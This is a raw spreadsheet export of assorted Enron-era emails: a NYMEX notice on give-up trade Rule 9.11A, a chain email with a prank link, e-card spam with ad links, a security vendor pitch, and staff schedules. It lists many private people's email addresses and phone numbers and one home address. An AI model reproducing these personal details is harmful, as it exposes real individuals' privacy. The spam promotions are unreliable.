registered billing entity, Member Firm or Floor Broker to whom the order is_x000D_
transmitted._x000D_
_x000D_
!    Rule 9.11 will provide that, in the absence of an applicable give-up_x000D_
agreement, a Clearing Member may reject a trade only if: (1) the trade_x000D_
exceeds trading limits established by the Clearing Member for that customer_x000D_
that have been communicated to the executing broker as provided by the rule_x000D_
or (2) the trade is an error for which the executing broker is responsible._x000D_
_x000D_
!    The new rule also places affirmative obligations on executing brokers_x000D_
to confirm Clearing Member authorization for an account.  For example,_x000D_
prior to an executing broker accepting and executing an initial order for_x000D_
any new customer account, such executing broker must confirm with the_x000D_
Clearing Member by telephonic, electronic or written means, that:_x000D_
(a)  the customer has a valid account with the Clearing Member;_x000D_
(b)  the account number;_x000D_
(c)  the brokerage rate;_x000D_
(d)  the customer is authorized by the Clearing Member to place orders with_x000D_
the executing broker for that account; and_x000D_
(e)  a listing or summary of persons authorized to place orders for that_x000D_
account._x000D_
Moreover, the executing broker must retain a copy of the authorization or_x000D_
the specifics of the telephonic confirmation, which includes: opposite_x000D_
party, date, time, and any other relevant information.  The Compliance_x000D_
Department will conduct periodic audits of such records, and falsification_x000D_
of such information shall be the basis for disciplinary action._x000D_
_x000D_
_x000D_
If you have any questions concerning this new rule, please contact Bernard_x000D_
Purta, Senior Vice President, Regulatory Affairs and Operations, at (212)_x000D_
299- 2380; Thomas LaSala, Vice President, NYMEX Compliance Department, at_x000D_
(212) 299-2897; or Arthur McCoy, Vice President, Financial Surveillance_x000D_
Section, NYMEX Compliance Department, at (212) 299-2928,_x000D_
_x000D_
NEW RULE 9.11A ("Give-Up Trades")_x000D_
_x000D_
(Entire rule is new.)_x000D_
_x000D_
Rule 9.11A     Give-Up Trades_x000D_
_x000D_
In the absence of a give-up agreement whose terms and conditions govern the_x000D_
responsibilities/obligations of executing brokers, customers and Clearing_x000D_
Members, the following rules shall define the respective_x000D_
responsibilities/obligations of those parties to an order.  The "executing_x000D_
broker", as used in this rule, is the registered billing entity, Member_x000D_
Firm or Floor Broker to whom the order is transmitted._x000D_
_x000D_
(A)    Responsibilities/Obligations of Clearing Members_x000D_
_x000D_
(1). Limits Placed by Clearing Member.   A Clearing Member may, in its_x000D_
discretion, place trading limits on the trades it will accept for give-up_x000D_
for a customer's account from an executing broker, provided however, that_x000D_
the executing broker receives prior written or electronic notice from the_x000D_
Clearing Member of the trading limits on that account.  Notice must be_x000D_
received by the executing broker in a timely manner.  A copy of such notice_x000D_
shall be retained by the Clearing Member._x000D_
_x000D_
(2). Trade Rejection.  A Clearing Member may reject ("DK") a trade only if:_x000D_
(1) the trade exceeds the trading limits established under Section I(A) of_x000D_
this rule for that customer and it has been communicated to the executing_x000D_
broker as described in Subsection (A); or (2) the trade is an error for_x000D_
which the executing broker is responsible.  If a Clearing Member has a_x000D_
basis for rejecting a trade, and chooses to do so in accordance with the_x000D_
provisions of Rule 2.21(B), it must notify the executing broker promptly._x000D_
_x000D_
(3). Billing.  A Clearing Member will pay all floor brokerage fees incurred_x000D_
for all transactions executed by the executing broker for the customer and_x000D_
subsequently accepted by the Clearing Member by means of the ATOM system._x000D_
Floor brokerage fees will be agreed upon in advance among the Clearing_x000D_
Member, customer and the executing broker._x000D_
_x000D_
(B)  Responsibilities/Obligations of Executing Brokers_x000D_
_x000D_
(1)  Customer Order Placement.  An executing broker will be responsible for_x000D_
determining that all orders are placed or authorized by the customer.  Once_x000D_
an order has been accepted, a broker or the broker's clerk must:_x000D_
_x000D_
(a)  confirm the terms of the order with the customer;_x000D_
(b)  accurately execute the order according to its terms;_x000D_
(c)  confirm the execution of the order to the customer as soon as_x000D_
practicable; and_x000D_
(d)  transmit such executed order to the Clearing Member as soon as_x000D_
practicable in accordance with Exchange Rules and procedures._x000D_
_x000D_
2.   Use of Other Persons.  Unless otherwise agreed in writing, the_x000D_
executing broker is allowed to use the services of another broker in_x000D_
connection with the broker's obligations under these rules.  The executing_x000D_
broker remains responsible to the customer and Clearing Member under these_x000D_
rules._x000D_
_x000D_
3.    Executing Broker Responsibility for Verifying Clearing Member_x000D_
Authorization.  Prior to a broker accepting and executing an initial order_x000D_
for any new customer account, the executing broker must confirm with the_x000D_
Clearing Member by telephonic, electronic or written means, that:_x000D_
(f)  the customer has a valid account with the Clearing Member;_x000D_
(g)  the account number;_x000D_
(h)  the brokerage rate;_x000D_
(i)  the customer is authorized by the Clearing Member to place orders with_x000D_
the executing broker for that account; and_x000D_
(j)  a listing or summary of persons authorized to place orders for that_x000D_
account._x000D_
The executing broker must retain a copy of the authorization or the_x000D_
specifics of the telephonic confirmation, which includes: opposite party,_x000D_
date, time, and any other relevant information.  The falsification of such_x000D_
information shall be the basis for disciplinary action._x000D_
_x000D_
4.   Rejection of Customer Order.  Where an executing broker has confirmed_x000D_
Clearing Member authorization to execute orders on behalf of a customer in_x000D_
accordance with this Rule 9.11A, the broker may, in the broker's_x000D_
discretion, reject an order that the customer transmits to the broker for_x000D_
execution.  The broker shall promptly notify the customer and the Clearing_x000D_
Member(s) of any such rejection._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Mon, 23 Oct 2000 03:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'tori.kuykendall@enron.com', 'lisa.gillette@enron.com', 'bryan.hull@enron.com', 'phillip.love@enron.com', 'chad.landry@enron.com', 'jay.reitmeyer@enron.com', 'kenneth.shulklapper@enron.com', 'paul.lucci@enron.com', 'eric.bass@enron.com'})</t>
  </si>
  <si>
    <t>[Fwd: Fw: Click on the link and see what happens]]</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 10/23/2000 _x000D_
10:34 AM ---------------------------_x000D_
_x000D_
_x000D_
Ross Berthelot &lt;rossberthelot@home.com&gt; on 10/22/2000 06:25:24 PM_x000D_
Please respond to rossberthelot@home.com_x000D_
To: Allison Istre &lt;a_istre@msn.com&gt;, Amy Allums &lt;aallums@law.tulane.edu&gt;, _x000D_
Ashly Morgan &lt;ashly@eatel.net&gt;, Ben Berthelot &lt;bberthelot@ccbcu.com&gt;, BBBERTH _x000D_
&lt;BBBERTH@aol.com&gt;, Beth Simon &lt;elizabetht@worldnet.att.net&gt;, Brian Bonjour _x000D_
&lt;brianbonjour@hotmail.com&gt;, Callie Fuselier &lt;CALLIEF@aol.com&gt;, Chad Greer _x000D_
&lt;cgreer@mgm.com&gt;, Chris Bourgeois &lt;cbourge@home.com&gt;, Clay and Corinne Hufft _x000D_
&lt;chufft@bellsouth.net&gt;, Clint Eilbeck &lt;ceilbeck@hotmail.com&gt;, David Ural _x000D_
&lt;dural54@aol.com&gt;, denise hopkins &lt;dahopkins@aol.com&gt;, Dizneach _x000D_
&lt;JDEACH@aol.com&gt;, Dog Boy &lt;denisnaq@home.com&gt;, Don Edgerton _x000D_
&lt;mbdperforms@eatel.net&gt;, Emmet Nicaud &lt;enicaud@entechsales.com&gt;, emily elliot _x000D_
&lt;psyee@showme.missouri.edu&gt;, erin saporito &lt;esaporito@crt.state.la.us&gt;, Grace _x000D_
Feng &lt;gracefeng77@yahoo.com&gt;, Jake Greig &lt;jakegreig@yahoo.com&gt;, Jenny Milliet _x000D_
&lt;j_milliet@hotmail.com&gt;, Jerome Landreneau &lt;LandreneauJ@aol.com&gt;, kent walker _x000D_
&lt;kwalker609@yahoo.com&gt;, Louis Ledet &lt;LLedet3234@aol.com&gt;, Luke Berthelot _x000D_
&lt;LBerth123@aol.com&gt;, Matt Greene &lt;megreene7@yahoo.com&gt;, Matt Lenhart _x000D_
&lt;Matthew.Lenhart@enron.com&gt;, Mercedes Arias &lt;ariamer@yahoo.com&gt;, Mike Breland _x000D_
&lt;mbrelan@lsu.edu&gt;, Mike Gooch &lt;michael.gooch@nmfn.com&gt;, Mom _x000D_
&lt;BGreig3234@aol.com&gt;, Myers Namie &lt;CLCS@MSN.COM&gt;, Naima Patton _x000D_
&lt;npatton21@hotmail.com&gt;, Paul Thibidoeaux &lt;pthibod@aol.com&gt;, Portealous _x000D_
&lt;tporteous@burke-mayer.com&gt;, Rhett Staehling &lt;staehling@hotmail.com&gt;, Scott _x000D_
DeHart &lt;dehart81@hotmail.com&gt;, Scott Naquin &lt;scottnaquin@aol.com&gt;, Shannon _x000D_
Strange &lt;CLCSNO@MSN.COM&gt;, Shawn Darrah &lt;sdarrah@lsu.edu&gt;, Tim Dietz _x000D_
&lt;TDietz@Allstate.com&gt;, Tom Williamson &lt;tpwilliamson@nalco.com&gt;, Tommy _x000D_
Porteous &lt;Porteoust@aol.com&gt;, Zack Smith &lt;zfoto@earthlink.net&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: [Fwd: Fw: Click on the link and see what happens]]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-------- Original Message --------_x000D_
Subject: Fw: Click on the link and see what happens]_x000D_
Date: Sat, 21 Oct 2000 01:59:45 -0500_x000D_
From: "Nikki Davies" &lt;ndavies8@home.com&gt;_x000D_
Reply-To: "Nikki Davies" &lt;ndavies8@home.com&gt;_x000D_
To: "Virginia Mire" &lt;vlm734s@mail.smsu.edu&gt;,"Ross Berthelot"_x000D_
&lt;rossberthelot@home.com&gt;,"Paula Durand" &lt;paula.durand@db.com&gt;,"Paul_x000D_
Chadick" &lt;PJChadik@aol.com&gt;,"Nikki Bausbacher"_x000D_
&lt;nikkib@protolink.com&gt;,"Mom &amp; Dad" &lt;jbdavies@mindspring.com&gt;,"Michelle_x000D_
Perron" &lt;MsShell328@aol.com&gt;,"Mark Ahern"_x000D_
&lt;eiuahern@hotmail.com&gt;,"Katherine &amp; Jamie Howard"_x000D_
&lt;kajam@webtv.net&gt;,"Jeremy Louviere" &lt;jml4489@hotmail.com&gt;,"Diana Gary"_x000D_
&lt;diana@delhommecpa.com&gt;,"Anthony Phillips"_x000D_
&lt;anth0ny24@hotmail.com&gt;,"Amber Mitchell" &lt;amitche@lsu.edu&gt;,"Adam Gula"_x000D_
&lt;tke577@webtv.net&gt;_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: "Yager, Gerard J SIEP-EPT-DD" &lt;GY983773@MSXSEPC.SHELL.COM&gt;_x000D_
To: "'Nikki Davies (home)'" &lt;ndavies8@home.com&gt;; "'jeanne'"_x000D_
&lt;jeannec@gambitweekly.com&gt;; "'Tracy A Fitzgerald'"_x000D_
&lt;Tracy.A.Falk@mvn02.usace.army.mil&gt;_x000D_
Sent: Thursday, October 19, 2000 3:49 PM_x000D_
Subject: Click on the link and see what happens]_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt; &gt;&gt; &gt; &gt; &gt; &gt;  &gt;&gt; &gt; &gt; &gt;       &lt;A HREF="_x000D_
http://home.att.net/~viseguy/fun.html_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 08:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.shapiro@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'david.parquet@enron.com'})</t>
  </si>
  <si>
    <t>Call with Gov Davis</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached document regarding the call to Gov. Davis_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 11:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Julian Rose_x000D_
15 Greenwich Hills Drive_x000D_
Greenwich, CT 06831_x000D_
_x000D_
_x000D_
Phone:  (203) 531 0691 (h) _x000D_
 (203) 829 9300_x000D_
 Debbie Parker (203) 625 7970</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 07:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Presentation to Trading Track A&amp;A</t>
  </si>
  <si>
    <t xml:space="preserve">Ina, _x000D_
_x000D_
Can you please forward the presentation to Mog._x000D_
_x000D_
Phillip_x000D_
---------------------- Forwarded by Phillip K Allen/HOU/ECT on 04/18/2001 _x000D_
02:50 PM ---------------------------_x000D_
From: Karen Buckley/ENRON@enronXgate on 04/18/2001 10:56 AM CDT_x000D_
To: Phillip K Allen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: Presentation to Trading Track A&amp;A_x000D_
_x000D_
Hi Philip_x000D_
_x000D_
If you do have slides preapred,, can you have your assistant e:mail a copy to _x000D_
Mog Heu, who will conference in from New York._x000D_
_x000D_
Thanks, karen_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Allen, Phillip  _x000D_
Sent: Wednesday, April 18, 2001 10:30 AM_x000D_
To: Buckley, Karen_x000D_
Subject: Re: Presentation to Trading Track A&amp;A_x000D_
_x000D_
The topic will the the western natural gas market.  I may have overhead _x000D_
slides.  I will bring handouts._x000D_
</t>
  </si>
  <si>
    <t>Re: Annual Meeting Q&amp;A</t>
  </si>
  <si>
    <t xml:space="preserve">Currently an announcement is scheduled for mid may so there may be more _x000D_
public information available then.  In the meantime, I would answer the _x000D_
question as follows: Enron will continue to focus its attention on the _x000D_
commercial, light manufacturing and industrial end user markets. Enron _x000D_
continues to explore opportunities to serve the residential market and we _x000D_
believe that the market presents opportunities that were not available even a _x000D_
couple of years ago (for example, the  rising acceptance of online purchasing _x000D_
by consumers presents low cost customer acquisition and account management _x000D_
possibilities that didn't exist when Enron last moved into residential _x000D_
markets). We believe, however, that the residential market opportunity is _x000D_
best pursued through a separate entity outside of Enron  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mary Clark@ENRON_x000D_
04/20/2000 02:31 PM_x000D_
To: Steven J Kean/HOU/EES@EES, Maureen McVicker/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Annual Meeting Q&amp;A_x000D_
_x000D_
Steve, we need to include a potential question in the Q&amp;A document that _x000D_
addresses if Enron will get back into the residential business (i.e. Resco).  _x000D_
Could you provide an answer to this question.  I need by end of biz Monday.  _x000D_
Thanks._x000D_
_x000D_
Mary_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 14:37:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Gas Fundamentals Website</t>
  </si>
  <si>
    <t>Thanx_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Monday, September 17, 2001 3:37 PM_x000D_
To:	Dorland, Chris_x000D_
Subject:	Gas Fundamentals Website_x000D_
_x000D_
After rebooting your computer, you should now have full access to the Gas Fundamentals Site.  To get onto the Gas Message Board, you can use your corp id and password.  If you should have any questions, please feel free to contact me.  _x000D_
_x000D_
Thank you, _x000D_
_x000D_
Amanda K. Huble _x000D_
Gas Fundamentals _x000D_
Phone: (713) 853-4384_x000D_
Pager: (877) 482-0772_x000D_
Fax: (713) 646-8453</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 18:33:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jan-g1@hotmail.com'})</t>
  </si>
  <si>
    <t>An E-card From Your Friend!</t>
  </si>
  <si>
    <t>Your friend jan jan found a site that they thought you'd like.  Check it out:_x000D_
_x000D_
http://www.netlaughter.com/camera.htm_x000D_
_x000D_
_x000D_
_x000D_
This free tell-a-friend service is made possible by our sponsors:_x000D_
_x000D_
================================_x000D_
ARE YOU SINGLE?_x000D_
_x000D_
Visit the web's favorite meeting place..._x000D_
Find love at Dream Mates!_x000D_
_x000D_
http://www.supertaf.com/adt.php?a=7239567_x000D_
================================_x000D_
_x000D_
===========================================_x000D_
** SAVE UP TO 80% ON INKJET CARTRIDGES! **_x000D_
_x000D_
Lowest Prices and Highest Quality products._x000D_
FREE SHIPPING with minimum purchase._x000D_
Customer satisfaction guaranteed._x000D_
_x000D_
http://www.supertaf.com/adt.php?a=7240015_x000D_
===========================================_x000D_
_x000D_
This email could have been worth $10,000! Nearly everything you do on iWon -_x000D_
from reading your email to checking your horoscope to playing games - is_x000D_
worth entries towards weekday $10,000 prizes, $100,000 in monthly prizes and_x000D_
the iWon Grand Prize worth up to $25 Million! So stop whatever you're_x000D_
doing... and start doing it on iWon. It could make you rich! No purchase_x000D_
necessary. See site for official rules, odds and prize information._x000D_
Promotion ends 3/31/02._x000D_
Click Here:  http://www.supertaf.com/adt.php?a=7239568_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
_x000D_
You received this email because someone visited our site and wanted to_x000D_
_x000D_
tell you about it.  To answer, simply reply to this message._x000D_
_x000D_
Click here if you don't want to be reached through our service:_x000D_
_x000D_
http://supertaf.com/optout.php?email=James;;Derrick()enron;;com_x000D_
_x000D_
_x000D_
_x000D_
Report Abuse: http://supertaf.com/index.php?page=abuse_x000D_
_x000D_
Got a question?  http://supertaf.com/index.php?page=faq_x000D_
_x000D_
Sender's IP address: 63.214.239.29_x000D_
_x000D_
----------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 08:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I updated the worksheet with a little more info and I added Trco and Tetco _x000D_
Marktet area information.  I did this quickly so let me know if something _x000D_
doesn't look right.  On Monday, we will show you a bid for the Tetco and Trco _x000D_
volumes._x000D_
_x000D_
Also, the Tetco and Trco volumes are monthly and the CGAS volumes are daily._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'blanca.lopez@enron.com'})</t>
  </si>
  <si>
    <t>Diamond Invoice</t>
  </si>
  <si>
    <t>Thanks!_x000D_
_x000D_
Blanca</t>
  </si>
  <si>
    <t>Top 10 Reasons You Should Check Your Pulse</t>
  </si>
  <si>
    <t>Is available only through Friday, Oct. 27_x000D_
Is located at: survey.enron.com_x000D_
_x000D_
_x000D_
Top 10 Reasons You Should Fill Out The Pulse Survey:_x000D_
10. This is one time silence isn't golden._x000D_
9. Those pesky flashing red lights are trained to come back on until you fill _x000D_
it out._x000D_
8. 50% response rate.  3 days left to go.  You do the math._x000D_
7. Despite what you may think, the survey results don't just go spinning into _x000D_
cyberspace.  There are action teams in operation all around Enron whose sole _x000D_
mission is to resolve problems that are identified in the survey feedback._x000D_
6. It's free!  (And very easy, too.)_x000D_
5. You have a right to remain silent.  But if you give up that right, we may _x000D_
be able to help you._x000D_
4. For the 15 minutes you're filling it out, you don't have to work!_x000D_
3. You can say what you really feel about your job and Enron without fear, _x000D_
because the survey is completely confidential._x000D_
2. Do you really want that other business unit one-upping you in _x000D_
participation numbers?_x000D_
And the number one reason you (yes, you) should fill out The Pulse:_x000D_
1. We're going to keep sending these emails until we have 100% participation.</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 12:14:11 -0800 (PST)</t>
  </si>
  <si>
    <t>Call John Zuffeleri in Calgary.</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 10:49:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pmar@mofo.com'})</t>
  </si>
  <si>
    <t>frozenset({'enron &lt;.carl@enron.com&gt;', 'apx &lt;.james@enron.com&gt;', 'ladwp &lt;.kjehl@enron.com&gt;', 'reliant &lt;.randy@enron.com&gt;', 'enron &lt;.bob@enron.com&gt;', 'apx &lt;.robert@enron.com&gt;', 'counsel &lt;.jeff@enron.com&gt;', 'b..sanders@enron.com', 'reliant &lt;.michael@enron.com&gt;', 'counsel &lt;.gary@enron.com&gt;', 'mirant &lt;.zack@enron.com&gt;', 'reliant &lt;.david@enron.com&gt;', 'avista &lt;.patricia@enron.com&gt;', 'sempra &lt;.alan@enron.com&gt;', 'sempra &lt;.gregory@enron.com&gt;', 'e-mail &lt;.marc@enron.com&gt;', 'enron &lt;.dan@enron.com&gt;', 'ladwp &lt;.david@enron.com&gt;', 'ladwp &lt;.richard@enron.com&gt;', 'mirant &lt;.brian@enron.com&gt;', 'powerex &lt;.howard@enron.com&gt;', 'avista &lt;.richard@enron.com&gt;'})</t>
  </si>
  <si>
    <t>FW: PG&amp;E v. State of Calif--Complaint for Inverse Condemnation</t>
  </si>
  <si>
    <t xml:space="preserve">Have you seen this:  PG&amp;E filed action in SF Superior Court on commandeering_x000D_
claim._x000D_
_x000D_
_x000D_
Patricia S. Mar_x000D_
Morrison &amp; Foerster LLP_x000D_
425 Market St., 33rd Floor_x000D_
San Francisco, CA 94105_x000D_
Phone: (415) 268-6157_x000D_
FAX:    (415) 268-7522_x000D_
e-mail: pmar@mofo.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
============================================================================_x000D_
_x000D_
This message contains information which may be confidential and privileged._x000D_
Unless you are the addressee (or authorized to receive for the addressee),_x000D_
you may not use, copy or disclose to anyone the message or any information_x000D_
contained in the message.  If you have received the message in error, please_x000D_
advise the sender by reply e-mail @mofo.com, and delete the message._x000D_
Thank you very much._x000D_
_x000D_
============================================================================_x000D_
_x000D_
 - PG&amp;E v. CA.pdf </t>
  </si>
  <si>
    <t>Mon, 22 May 2000 08:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'debra.perlingiere@enron.com', 'nony.flores@enron.com', 'robert.walker@enron.com', 'tana.jones@enron.com', 'matt.maxwell@enron.com', 'mary.ogden@enron.com', 'susan.flynn@enron.com', 'kimberlee.bennick@enron.com', 'linda.guinn@enron.com', 'laurie.mayer@enron.com', 'susan.bailey@enron.com'})</t>
  </si>
  <si>
    <t>Databases</t>
  </si>
  <si>
    <t xml:space="preserve">Please let me know as soon as possible if you are experiencing any type of _x000D_
problems with the various databases that you use-- particularly Access _x000D_
databases.  Thanks!_x000D_
_x000D_
sc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 06:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sharon.lay@travelpark.com'})</t>
  </si>
  <si>
    <t>FW: FW: ELECTION NEWS</t>
  </si>
  <si>
    <t>This is one of the best!!!!_x000D_
_x000D_
&gt; ----------_x000D_
&gt; From:  Yortex@aol.com[SMTP:Yortex@aol.com]_x000D_
&gt; Sent:  Thursday, November 09, 2000 12:13 PM_x000D_
&gt; To:  abi@mail.cybermesa.com; lizard_ar@yahoo.com; Sharon@travelpark.com;_x000D_
&gt; m.shute@eudoramail.com; BourneB@umsystem.edu_x000D_
&gt; Subject:  Re: FW: ELECTION NEWS_x000D_
&gt;_x000D_
&gt;  &lt;&lt;truman2002.ppt&gt;&gt;_x000D_
&gt; I'll send it again here -- just a Missouri political joke...  I'll resend_x000D_
&gt; it_x000D_
&gt; to a few of you in case you had trouble opening it..._x000D_
&gt;_x000D_
_x000D_
 - truman2002.ppt</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 03:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'doornbos@socrates.berkeley.edu'})</t>
  </si>
  <si>
    <t>Re: GSPP Electricity Policy Summit meeting minutes</t>
  </si>
  <si>
    <t>Rob,_x000D_
_x000D_
I agree.  One important objective--to raise the School's visibility--is _x000D_
better accomplished by doing this_x000D_
event solo.  Another unit is not needed and could easily detract from GSPP.  _x000D_
I will raise the issue with_x000D_
the dean but I would be very surprised if he was interested in bringing in a _x000D_
partner at this point._x000D_
_x000D_
Annette_x000D_
_x000D_
gramlr@pjm.com wrote:_x000D_
_x000D_
&gt; Coordinating committee,_x000D_
&gt; Here are my notes from the meeting.  The address list above is the current _x000D_
group_x000D_
&gt; so we can continue by e-mail by replying to this group until people are _x000D_
ready_x000D_
&gt; for another call.  I don't think the Dean needs to hear all of the back and_x000D_
&gt; forth.  Lee Friedman has kindly agreed to advise and participate._x000D_
&gt;_x000D_
&gt; Open questions:_x000D_
&gt; -do we want to join with the business school for this event?_x000D_
&gt; -should we push the date back?_x000D_
&gt; -what is your top 5 list of speakers?_x000D_
&gt; -any comments on what we agreed on or revisions to the minutes?_x000D_
&gt;_x000D_
&gt; This is really moving!  Thanks everyone._x000D_
&gt; Rob &lt;&lt;Electricity policy summit minutes 082200.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt; Rob Gramlich_x000D_
&gt; PJM Market Monitoring Unit_x000D_
&gt; (610) 666-4291_x000D_
&gt; gramlr@pjm.com_x000D_
&gt;_x000D_
&gt;                                                    Name: Electricity policy _x000D_
summit minutes 082200.doc_x000D_
&gt;    Electricity policy summit minutes 082200.doc    Type: WINWORD File _x000D_
(application/msword)_x000D_
&gt;                                                Encoding: x-uuencode_x000D_
_x000D_
 - doornbos.vcf</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 05:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'mona.petrochko@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>WGA's Schedules for the Week of May 7 - 11, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Western Government Affairs_x000D_
WEEKLY SCHEDULES_x000D_
For the Week of May 7 - 11, 2001_x000D_
_x000D_
_x000D_
Paul Kaufman_x000D_
_x000D_
Mon  5/07  Portland OR office_x000D_
Tue  5/08  Portland OR office_x000D_
Wed  5/09  Salt Lake City UT_x000D_
Thur  5/10  Houston TX _x000D_
Fri  5/11  Portland OR office_x000D_
_x000D_
Sue Mara_x000D_
_x000D_
Mon  5/07  San Francisco CA office_x000D_
Tue  5/08  Portland OR office_x000D_
Wed  5/09  San Francisco CA office_x000D_
Thur  5/10  San Francisco CA office_x000D_
Fri  5/11  San Francisco CA office_x000D_
_x000D_
Jeff Dasovich_x000D_
_x000D_
Mon  5/07  Sacramento CA _x000D_
Tue  5/08  TBD_x000D_
Wed  5/09  TBD_x000D_
Thur  5/10  TBD_x000D_
Fri  5/11  TBD_x000D_
_x000D_
Sandi McCubbin_x000D_
_x000D_
Mon  5/07  Sacramento CA_x000D_
Tue  5/08  Sacramento CA_x000D_
Wed  5/09  TBD_x000D_
Thur  5/10  TBD_x000D_
Fri  5/11  TBD_x000D_
_x000D_
Mona Petrochko_x000D_
_x000D_
Mon  5/07  Vacation_x000D_
Tue  5/08  Vacation_x000D_
Wed  5/09  Vacation_x000D_
Thur  5/10  Vacation_x000D_
Fri  5/11  Vacation_x000D_
_x000D_
Alan Comnes_x000D_
_x000D_
Mon  5/07  Portland OR office_x000D_
Tue  5/08  Portland OR office_x000D_
Wed  5/09  Portland OR office_x000D_
Thur  5/10  Portland OR office_x000D_
Fri  5/11  Portland OR office_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 10:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Xcert secures your data in real time</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 11/16/2000 06:20 PM -----_x000D_
_x000D_
	"Lynn Coldwater" &lt;lcoldwater-slx@xcert.com&gt;_x000D_
	11/16/2000 01:02 PM_x000D_
		 _x000D_
		 To: &lt;skean@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Xcert secures your data in real time_x000D_
_x000D_
Dear Steven,_x000D_
_x000D_
In the Internet/Intranet security world time is everything.  Some security_x000D_
vendors are using Certificate Revocation Lists (CRL) to revoke user_x000D_
privileges.  This can be very dangerous to your data!_x000D_
_x000D_
We would like to show you how Xcert enables its customers to immediately_x000D_
revoke all network privileges from former employees, customers and business_x000D_
partners while protecting their company data and assets.  We are the only_x000D_
digital certificate company that provides this real-time revocation_x000D_
capability because our products were built on the Internet to work on the_x000D_
Internet._x000D_
_x000D_
Please call 800-721-9191 or send us an email so that we can arrange for you_x000D_
to talk to one of our_x000D_
Account Representatives who can show you how Xcert protects your data in_x000D_
real-time._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Xcert Inside Sales_x000D_
info@xcert.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 01:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Pup,_x000D_
_x000D_
Howdy.   Back from the UK and Norway and am off for vacation to Boston and _x000D_
area for a wedding in Chris' family at lunch today.  There will be 65 Flynns _x000D_
there.  Hopefully it will be cooler.  _x000D_
_x000D_
Update for Dallas.  Golf - tee time for 4 (I didn't know if anyone else would _x000D_
join us) at 1:28.  Spa - Brenda and Chris both have 1 1/2 hours massages at _x000D_
1:50 pm.  If Brenda wants anything else she can call the Four Seasons but at _x000D_
least they both have a spot.  I look forward to the weekend.  _x000D_
_x000D_
This is the most prepared we will have ever been for the weekend._x000D_
_x000D_
Mike _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jonny Jones" &lt;jjones@jonesenergy.com&gt; on 08/18/2000 03:39:29 PM_x000D_
To: &lt;Mike.McConnell@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: Way to go!_x000D_
_x000D_
_x000D_
We have a reservation and made one for you as a backup which I will cancel._x000D_
Golf &amp; massages sounds great.   1 pm on Friday for golf would be great.  I_x000D_
have the tickets covered._x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
From: &lt;Mike.McConnell@enron.com&gt;_x000D_
To: &lt;jjones@jonesenergy.com&gt;_x000D_
Subject: RE: Way to go!_x000D_
Date: Thu, 17 Aug 2000 15:58:14 -0500_x000D_
Message-ID: &lt;OF3055D4C1.A140DF20-ON8625693E.0072D483@enron.com&gt;_x000D_
MIME-Version: 1.0_x000D_
